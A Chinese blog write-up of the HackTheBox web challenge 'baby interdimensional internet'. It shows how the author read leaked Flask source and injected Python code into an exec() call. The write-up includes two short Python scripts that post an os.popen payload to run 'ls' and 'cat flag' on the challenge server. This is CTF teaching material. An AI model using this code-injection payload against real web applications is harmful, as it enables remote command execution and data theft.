HackTheBox-baby interdimensional internet

最新推荐文章于 2024-08-31 09:03:57 发布
最新推荐文章于 2024-08-31 09:03:57 发布
阅读量559 收藏
点赞数
分类专栏: # Web 文章标签: web 安全 靶机 网络安全 flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122507730
版权

文章目录

概述

HackTheBox 网站CTF靶场Web相关题目baby interdimensional internet,题目地址https://app.hackthebox.eu/challenges/baby-interdimensional-internet,主要考察Flask源代码审计和远程命令执行相关知识点。

在这里插入图片描述

题目

题目提示为calculator

开启程序实例后,提示访问46.101.23.188:31501

访问http://46.101.23.188:31501/,查看源代码,发现/debug路径
在这里插入图片描述
访问http://46.101.23.188:31501/debug,发现源代码,为Flask

在这里插入图片描述

源代码分析

分析程序,可以通过POST方法传入ingredientmeasurements两个参数,交由calc()处理,和题目提示的calculator有联系,查看calc()的代码,发现其调用了exec

测试

先正常传入ingredientmeasurements两个参数
在这里插入图片描述
发现measurements回显在响应页面。

利用代码

编写利用代码,执行ls命令,发现flag文件

#!/usr/bin/python3 

import requests 

data = {'ingredient': 'our_var', 'measurements': '__import__("os").popen("ls").read()'}
addr = 'http://46.101.23.188:31501'
r = requests.post(addr, data=data)

print(r.content)

在这里插入图片描述

修改利用代码,读取flag文件,得到flag的值

#!/usr/bin/python3 

import requests 

data = {'ingredient': 'our_var', 'measurements': '__import__("os").popen("cat flag").read()'}
addr = 'http://46.101.23.188:31501'
r = requests.post(addr, data=data)

print(r.content)

在这里插入图片描述

galaxy3000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
html-json
weixin_45390091的博客
03-17 1278
JSON 1.概念 虽然它是基于 JavaScript 语法,但它独立于JavaScript,一个 JSON 对象可以被储存在它自己的文件中,这基本上就是一个文本文件,扩展名为 .json, 还有 MIME type 用于 application/json. 2.作用 作为对象:用于解读 JSON 中的数据 作为字符串:用于通过网络传输 JSON 数据 3.结构 { "squadName" : "Super hero squad", "homeTown" : "Metro City", "for
Hack The Box——Zetta
江左盟的博客
03-03 2538
简介 信息收集 使用nmap 10.10.10.156 -sC -A对目标主机进行扫描,如图: 发现开启21,22,80端口,操作系统应该是Debian 10了。尝试常见的ftp弱口令,如图: 发现无法登录成功,支持IPv6,不允许匿名访问。尝试Pure-FTPd存在的已知漏洞CVE-2014-6271,如图: 并不能执行命令,然后访问80端口,发现网站标题是Ze::a...
HackTheBox-Intelligence WP
h1nt的博客
10-19 2958
0x01 端口探测 使用nmap对靶机进行探测: nmap -sV -sC 10.10.10.248 比较标准的DC端口,还多了个WEB的80。 0x02 user.txt 进WEB看看,发现在主页目录可以下载文档。主页能下载的文档文件名为2020-01-01-upload.pdf 遂写了脚本进行爆破,将所有的文档下载下来: import requests for month in range(1, 13): for day in range(1, 32):
Hack The Box -----------------------Active
大方子
12-16 6936
这次的靶机Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
HTB-baby~
TA不懒,但还没有添加简介
03-31 252
HTB-baby~
Interdimensional 开源项目指南
最新发布
gitblog_00349的博客
08-31 388
Interdimensional 开源项目指南 InterdimensionalSpatial scrolling for your web pages.项目地址:https://gitcode.com/gh_mirrors/in/Interdimensional 项目介绍 Interdimensional 是一个假设基于跨维度技术的创新开源项目,尽管原资料并未提供具体技术细节,我们可以假定该项...
探索未来网页交互:Interdimensional 穿越式滚动体验
gitblog_00100的博客
08-30 387
探索未来网页交互:Interdimensional 穿越式滚动体验 InterdimensionalSpatial scrolling for your web pages.项目地址:https://gitcode.com/gh_mirrors/in/Interdimensional 在这个数字化时代,用户体验成为设计的核心。今天,我们向您推荐一个创新的开源项目——Interdimensiona...
效果超好!全新 DALL-E 3 必须掌握的 20 种公式使用方法
Maynor的博客
06-24 1096
图片描述:Marketing poster for a smartwatch, using a futuristic neon style, showcasing its sleek design and fitness tracking features, with the catchy tagline “Wear the Future, Track the Now.”
JavaScript------JSON
cmHuney的博客
02-03 375
2. JSON 可以作为一个对象或者字符串存在,前者用于解读 JSON 中的数据,后者用于通过网络传输 JSON 数据。JavaScript 提供一个全局的 可访问的 JSON对象来对这两种数据进行转换。1. JSON是一种按照 JavaScript 对象语法的数据格式,虽然它是基于 JavaScript 语法,但它独立于 JavaScript,这也是为什么许多程序环境能够读取(解读)和生成 JSON。的变量,那么我们就可以使用在JavaScript对象基础文章中相同的点/括号表示法来访问其中的数据。
Interdimensional
10-28
《跨维度设计:深入探索“Interdimensional”字体的魅力》 在数字设计的世界里,字体是一种无声的语言,它能够传达情绪、风格以及品牌个性。当我们谈论“Interdimensional”时,我们不仅仅是触及到了一个简单的字体...
自动翻滚网页Interdimensional.zip
07-18
Interdimensional 是一款通过重力感知,能够实现自动滚动手持设备中的网页的移动设备开发的插件。并且,只支持IOS系统,对设备的要求也比较高。示例代码:Interdimensional.charge({  /**  * Pixels per ...
全新DALL-E 3 必须掌握的 20种提示词.pdf
11-14
5. Interdimensional Realism - 跨维度现实主义 这种提示词是跨维度现实主义的精髓,旨在描绘特定的场景,将现实主义与超现实元素融合,创造出通往其他维度或现实的门户或远景。用户可以使用DALL-E 3生成跨维度现实...
impact_7drl_mac:Jeff Lait的Mac游戏“ Rogue Impact”的Mac版本-最初来自http
04-23
You are an interdimensional traveller who have been jumping between worlds with your sibling. Recently, you became separated, so you have more than idle curiosity driving you from
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 854
然后看它们之间的各种各样的依赖关系
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 973
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
网络安全网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 369
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
Web3开发与安全:6个月高效学习路径
weixin_47075747的博客
08-30 559
这份计划应该能帮助你系统地学习智能合约开发和安全审计技能,同时克服英语的障碍。
需方软件供应链安全保障要求及开源场景对照自评表(上)
LJQClqjc的博客
08-27 227
开源软件供应链作为软件供应链的一种特殊形式,该国标亦适用于指导开源软件供应链中的供需双方开展组织管理和供应活动管理,增强开源软件供应链组织管理和供应活动管理能力,防范供应链导致的开源软件产品及其生命周期中断类的供应关系风险,防止供应活动在开源软件及其生命周期服务中引入新的技术安全风险和知识产权风险(例如:防止供应活动引入的软件漏洞、后门、篡改、伪造、许可协议不合规等),保障业务持续稳定安全运行。以下根据我们的分析研究,对国标中与开源供应链安全直接相关的内容进行识别与分析,供业内参考。
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 344
SaveButton 安全控件说明
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值